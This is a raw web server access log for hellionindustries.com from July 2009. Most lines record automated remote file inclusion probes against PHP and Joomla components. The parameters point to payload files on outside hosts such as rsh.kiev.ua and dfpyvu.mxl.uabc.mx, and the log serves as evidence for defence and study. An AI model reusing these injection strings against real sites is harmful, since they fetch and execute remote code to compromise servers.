119.245.138.143 - - [05/Jul/2009:01:36:56 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 1517 "-" "Mozilla/5.0" "www.hellionindustries.com"
119.245.138.143 - - [05/Jul/2009:01:38:03 -0700] "GET /logs/access_090212.log////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
119.245.138.143 - - [05/Jul/2009:01:38:12 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:01:38:20 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:01:38:20 -0700] "GET /index.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:01:38:20 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:24 -0700] "GET /logs///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 1524 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:24 -0700] "GET //////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 787 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:24 -0700] "GET /logs/access.log///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:27 -0700] "GET //////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 787 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:27 -0700] "GET /logs///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1524 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:27 -0700] "GET /logs/access.log///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:36 -0700] "GET /logs///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 1524 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:36 -0700] "GET /logs/access.log///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:36 -0700] "GET //////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 787 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:46 -0700] "GET /logs///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1524 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:46 -0700] "GET //////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 787 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:38:47 -0700] "GET /logs/access.log///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:39:23 -0700] "GET /logs/access.log%20%20///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:39:27 -0700] "GET /logs/access.log%20%20///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:39:27 -0700] "GET /logs/access.log%20%20///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:39:38 -0700] "GET /logs/access.log%20%20///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
201.232.54.48 - - [05/Jul/2009:01:41:29 -0700] "GET /logs/access.log%20%20///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
201.232.54.48 - - [05/Jul/2009:01:41:29 -0700] "GET //////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 787 "-" "Mozilla/5.0" "hellionindustries.com"
201.232.54.48 - - [05/Jul/2009:01:41:29 -0700] "GET /logs///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1524 "-" "Mozilla/5.0" "hellionindustries.com"
70.32.106.32 - - [05/Jul/2009:01:41:52 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.32.106.32 - - [05/Jul/2009:01:41:52 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.32.106.32 - - [05/Jul/2009:01:41:52 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:01:41:55 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:01:41:55 -0700] "GET /logs//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:01:41:55 -0700] "GET /logs/access.log//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:01:42:01 -0700] "GET /logs/access.log//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:01:42:01 -0700] "GET /logs//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:01:42:01 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:42:45 -0700] "GET //////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 787 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:42:46 -0700] "GET /logs/access_090212.log%20%20///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:42:46 -0700] "GET /logs///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 1524 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:43:04 -0700] "GET //////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 787 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:43:05 -0700] "GET /logs///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 1524 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:43:05 -0700] "GET /logs/access_090212.log%20%20///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:45:22 -0700] "GET /logs/access.log///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:45:47 -0700] "GET /logs/access.log///////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
119.245.138.143 - - [05/Jul/2009:01:45:55 -0700] "GET /logs/access_090212.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:47:24 -0700] "GET //////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 787 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:47:25 -0700] "GET /logs///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1524 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:47:25 -0700] "GET /logs/access_090212.log%20%20///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:47:43 -0700] "GET //////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 787 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:47:46 -0700] "GET /logs///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1524 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:47:46 -0700] "GET /logs/access_090212.log%20%20///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:01:50:01 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:01:50:01 -0700] "GET /logs//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
70.32.106.32 - - [05/Jul/2009:01:51:04 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.171.190.110 - - [05/Jul/2009:01:51:44 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
89.171.190.110 - - [05/Jul/2009:01:51:44 -0700] "GET /logs/access.log//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
89.171.190.110 - - [05/Jul/2009:01:51:45 -0700] "GET /logs//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:01:51:49 -0700] "GET /logs//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:01:51:49 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
65.98.59.178 - - [05/Jul/2009:01:55:04 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
65.98.59.178 - - [05/Jul/2009:01:55:04 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
65.98.59.178 - - [05/Jul/2009:01:55:04 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:57:08 -0700] "GET /logs/access.log///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:00:11 -0700] "GET /logs//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:00:11 -0700] "GET /db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:00:20 -0700] "GET /db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:00:20 -0700] "GET /logs//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.171.190.110 - - [05/Jul/2009:02:02:31 -0700] "GET /logs/access.log//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.171.190.110 - - [05/Jul/2009:02:02:33 -0700] "GET /db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.171.190.110 - - [05/Jul/2009:02:02:33 -0700] "GET /logs//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:02:03:43 -0700] "GET /logs/access.log///////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:05:39 -0700] "GET /logs/access.log//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:05:45 -0700] "GET /logs/access.log//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:02:06:25 -0700] "GET /mainbody.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:02:06:25 -0700] "GET /logs/mainbody.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:02:06:25 -0700] "GET /logs/access_090212.log/mainbody.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:08:27 -0700] "GET /logs/access.log%20//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:08:33 -0700] "GET /logs/access.log%20//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:09:40 -0700] "GET /logs/access.log//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:09:40 -0700] "GET /db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:09:40 -0700] "GET /logs//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:09:45 -0700] "GET /logs/access.log//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:09:45 -0700] "GET /db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
84.51.241.6 - - [05/Jul/2009:02:09:45 -0700] "GET /logs//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
87.229.45.106 - - [05/Jul/2009:02:15:22 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.229.45.106 - - [05/Jul/2009:02:15:22 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.229.45.106 - - [05/Jul/2009:02:15:22 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.229.45.106 - - [05/Jul/2009:02:17:12 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.171.190.110 - - [05/Jul/2009:02:25:17 -0700] "GET /logs/access.log%20//db.php?commonpath=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
204.62.55.11 - - [05/Jul/2009:02:38:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.hellionindustries.com"
204.62.55.11 - - [05/Jul/2009:02:38:55 -0700] "GET /logs/access_090624.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:02:40:14 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:02:40:14 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:02:40:14 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:02:40:19 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:02:40:19 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:02:40:19 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:02:50:40 -0700] "GET /galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:02:50:40 -0700] "GET /logs//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:02:50:40 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
204.62.55.11 - - [05/Jul/2009:02:53:58 -0700] "GET /logs/access_090613.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:02:55:18 -0700] "GET /logs/access.log%20%20//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.27.10.34 - - [05/Jul/2009:02:57:15 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.hellionindustries.com"
64.27.10.34 - - [05/Jul/2009:02:57:15 -0700] "GET /?n=d HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.hellionindustries.com"
64.27.10.34 - - [05/Jul/2009:02:57:15 -0700] "GET /?m=a HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.hellionindustries.com"
64.27.10.34 - - [05/Jul/2009:02:57:15 -0700] "GET /?s=a HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.hellionindustries.com"
64.27.10.34 - - [05/Jul/2009:02:57:15 -0700] "GET /?d=a HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.hellionindustries.com"
74.53.70.114 - - [05/Jul/2009:02:58:35 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [05/Jul/2009:02:58:35 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [05/Jul/2009:02:58:35 -0700] "GET //vwar/backup/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [05/Jul/2009:02:58:47 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [05/Jul/2009:02:58:47 -0700] "GET //vwar/backup/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [05/Jul/2009:02:58:47 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.202.2.220 - - [05/Jul/2009:03:00:58 -0700] "GET /logs/!scan%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://163.17.8.18/m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.202.2.220 - - [05/Jul/2009:03:00:58 -0700] "GET /!scan%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://163.17.8.18/m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.202.2.220 - - [05/Jul/2009:03:00:59 -0700] "GET /logs/access.log/!scan%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://163.17.8.18/m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:03:02:06 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:03:02:06 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:03:02:06 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:03:02:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:03:02:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [05/Jul/2009:03:02:21 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.202.2.220 - - [05/Jul/2009:03:02:32 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://163.17.8.18/m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
